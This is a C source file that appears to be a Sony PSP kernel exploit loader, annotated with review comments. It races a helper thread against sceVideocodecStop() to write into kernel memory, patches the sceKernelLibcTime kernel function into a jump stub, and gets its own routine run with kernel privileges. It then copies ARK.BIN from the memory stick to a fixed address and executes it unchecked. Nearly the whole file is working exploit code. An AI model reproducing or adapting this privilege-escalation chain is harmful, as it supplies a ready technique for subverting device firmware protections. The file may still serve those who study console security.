#include <pspkernel.h>

// sceMeCodecWrapper: firmware-specific base address used by KernelContent()
// (the mutex-UID slot lives at +0x2F80). sw_address: the value storethread()
// keeps storing into a0[11]; do_exploit() sets it before each stage.
u32 sceMeCodecWrapper = 0x88136800, sw_address = 0;
// Flags shared between threads: is_exploited is set by KernelContent() and
// polled by do_exploit(); running is cleared by do_exploit() to stop storethread().
// NOTE(review): neither is volatile/_Atomic; the polling loops only re-read
// them because each iteration makes a function call — confirm with the toolchain used.
int is_exploited = 0, running = 1;
// Argument block passed to sceVideocodecStop(); a0[11] is also rewritten
// concurrently by storethread() while do_exploit() runs.
u32 a0[24];

// Helper thread: while running == 1, keeps storing sw_address into a0[11],
// the same slot do_exploit() resets to 0x09000000 on every loop iteration.
// NOTE(review): declared as returning int but falls off the end after
// sceKernelExitThread(0) without a return value; check the thread entry
// type expected by sceKernelCreateThread() in the SDK header.
int storethread()
{
    while (running == 1) {
        a0[11] = sw_address;
        sceKernelDelayThread(1);    // short delay between stores
    }

    sceKernelExitThread(0);
}

// Routine that do_exploit() expects to have executed with kernel privileges:
// re-creates the mutex whose UID is stored at sceMeCodecWrapper + 0x2F80,
// patches the two words at 0x8800F9C4 into a "jr $a0; nop" stub, and flushes
// both caches so the patched instructions are what gets fetched.
// NOTE(review): every address and the 0x2F80 offset are firmware-specific
// constants from this paste and are not validated anywhere here.
void KernelContent()
{
    is_exploited = 1;    // signals the polling loop in do_exploit() that this ran

    // Zeroes $k1 before the calls below. On the PSP, $k1 carries the caller's
    // privilege level for syscall checks — confirm against the firmware's handler.
    __asm("move $k1, $0;");

    //"restore" me_wrapper mutex UID
    SceUID (* _sceKernelCreateMutex)(const char *name, u32 attr, int init_count, void *options) = \
        (void *)FindExport("sceThreadManager", "ThreadManForUser", 0xB7D098C6);
    // NOTE(review): FindExport() (defined elsewhere) may return 0; the pointer is called unchecked.

    SceUID mutex = _sceKernelCreateMutex("SceKermitMe", 256, 0, NULL);

    _sw(mutex, sceMeCodecWrapper + 0x2F80);

    //sceKernelLibcTime - pass address of kernel function in first arg, restored later in ARK code. |:
    _sw(0x00800008, 0x8800F9C4);    //jr    $a0
    _sw(0, 0x8800F9C8);     //nop

    // Cache-maintenance routines called through absolute addresses rather than imports.
    void (* _sceKernelDcacheWritebackInvalidateAll)(void) = (void *)0x88000744;
    void (* _sceKernelIcacheInvalidateAll)(void) = (void *)0x88000E98;

    _sceKernelDcacheWritebackInvalidateAll();
    _sceKernelIcacheInvalidateAll();
}

// Two-stage sequence: repeatedly calls sceVideocodecStop() while storethread()
// keeps rewriting a0[11], first with a target near the mutex-UID slot and then
// with the patch site KernelContent() writes, until is_exploited is set.
// Afterwards ARK.BIN is read from the memory stick into 0x10000 and called.
// NOTE(review): neither polling loop has an iteration bound or timeout, so the
// function spins forever if the expected state never appears.
void do_exploit()
{
    is_exploited = 0;
    running = 1;

    // Stage-1 target: 36 bytes below the slot KernelContent() later writes the mutex UID to.
    sw_address = (sceMeCodecWrapper + 0x2F80) - 36;

    // Return values of thread creation/start are not checked.
    SceUID thid = sceKernelCreateThread("thid", storethread, 8, 512, THREAD_ATTR_USER, NULL);
    sceKernelStartThread(thid, 0, NULL);

    // Presumably loads the AV modules so the sceVideocodec import below resolves — confirm.
    sceUtilityLoadModule(0x300);
    sceUtilityLoadModule(0x303);

    int (* sceVideocodecStop)(u32 *a0, int a1) = (void *)FindImport("sceVideocodec", 0xA2F0564E, 0);
    // NOTE(review): FindImport() (defined elsewhere) result is used without a NULL check.

    memset(a0, 0, sizeof(a0));

    a0[0] = 0x05100601;
    a0[15] = 1;

    int i;    // NOTE(review): unused

    // Stage 1: re-issue the call until a0[2] holds 0x800201C3. Fields 2, 3, 4,
    // 11 and 15 are reset every iteration because a0[11] is being overwritten
    // by storethread() concurrently; the meaning of 0x800201C3 is not documented here.
    while (a0[2] != 0x800201C3) {
        a0[15] = 1;
        a0[3] = 0x09000000;
        a0[4] = 0x09000000;
        a0[2] = 0;
        a0[11] = 0x09000000;

        sceVideocodecStop(a0, 0);
    }

    fillvram(-1);    // fillvram() is defined elsewhere; appears to be a visual progress marker

    // Stage-2 target: 36 bytes below the code words KernelContent() patches.
    sw_address = 0x8800F9C4 - 36;

    int (* _sceKernelLibcTime)(u32, u32) = (void *)sceKernelLibcTime;

    // Stage 2: repeat until KernelContent() has set is_exploited. The second
    // argument is KernelContent's address with bit 31 set (presumably the
    // kernel segment alias of the same code — confirm).
    while (is_exploited != 1) {
        a0[15] = 1;
        a0[11] = 0x09000000;
        a0[3] = 0x09000000;
        a0[4] = 0x09000000;

        sceVideocodecStop(a0, 0);

        sceKernelDcacheWritebackAll();    // push the a0 stores out of the data cache before the call

        _sceKernelLibcTime(0x08800000, ((u32)&KernelContent | 0x80000000));
    }

    fillvram(0xFF00);

    running = 0;    // stop storethread()

    u8 buf[0x4000];    // 16 KiB on this thread's stack

    // NOTE(review): the open and read results are not checked, and the memcpy
    // below copies the whole buffer regardless of how many bytes were read, so a
    // failed or short read places uninitialised stack bytes at 0x10000.
    SceUID fd = sceIoOpen("ms0:/PSP/SAVEDATA/NPUG80320KEXPLOIT/ARK.BIN", PSP_O_RDONLY, 0777);
    sceIoRead(fd, buf, sizeof(buf));
    sceIoClose(fd);

    memcpy((void *)0x10000, buf, sizeof(buf));

    sceKernelDcacheWritebackAll();

    // Transfers control to the payload just copied in; ARK.BIN's contents are
    // executed with no integrity or origin check.
    void (* Start)(const char *) = (void *)0x10000;
    Start("ms0:/PSP/SAVEDATA/NPUG80320KEXPLOIT/");
}

// Module entry point, placed in the .text.start section. Calls fillvram()
// (defined elsewhere), runs do_exploit(), and reaches sceKernelExitGame()
// only if do_exploit() returns, i.e. only if the payload's Start() returns.
void _start() __attribute__ ((section (".text.start")));
void _start()
{
    fillvram(0x80808080);
    do_exploit();
    sceKernelExitGame();
}